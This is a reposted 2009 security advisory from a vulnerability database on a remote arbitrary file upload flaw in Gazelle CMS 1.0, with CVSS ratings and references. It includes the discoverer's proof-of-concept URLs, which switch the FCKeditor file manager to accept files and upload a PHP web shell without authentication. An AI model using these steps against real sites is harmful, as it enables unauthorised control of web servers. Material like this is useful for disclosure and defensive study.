Gazelle CMS 1.0 Remote Arbitrary Shell Upload Vulnerability

2009.09.15
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

==================================================== | Gazelle CMS 1.0 Remote Arbitrary File Upload Vuln | My Home Page : WwW.Sec-Code.CoM | Founded By RoMaNcYxHaCkEr ==================================================== [!] Discovered.: RoMaNcYxHaCkEr [!] Vendor.....: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download [!] My Homepage...: WwW.Sec-Code.CoM [!] Security - Codes Group ...: aB0-3tH4b T3rR0r , mr-al7rbi , sniper-code [!] Contact Me ...: rXh@Mail.Net.Sa [!] PoC........: http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Image ^^^^ This Is Default In Editor admin Try Change Image To File Like This : http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=File Upload Any Shell.php Then You See That,s Here E.G. : http://localhost/Ananta_Gazelle1.0/user/File/shell.php [!] Solution...: I Don,t Know He He :D , Contact With Me ;) [!] Greetingz..: All My Forum Members , My TeaM , Dexter Franklin ;) [!] Thx .. : &#216;&#183;&#216;&#217;&#65533;&#216; &#217;&#65533;&#216;&#170;&#216;&#217;&#65533;&#216;&#179; , IHTTeam For His Exploit [!] Fuck To .. : Third , Dev1l-Fucker <<< They Big Big Big Big Lamerz [!] rXh [!] bEST wISHES

References:

http://www.milw0rm.com/exploits/9433
http://secunia.com/advisories/33686


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top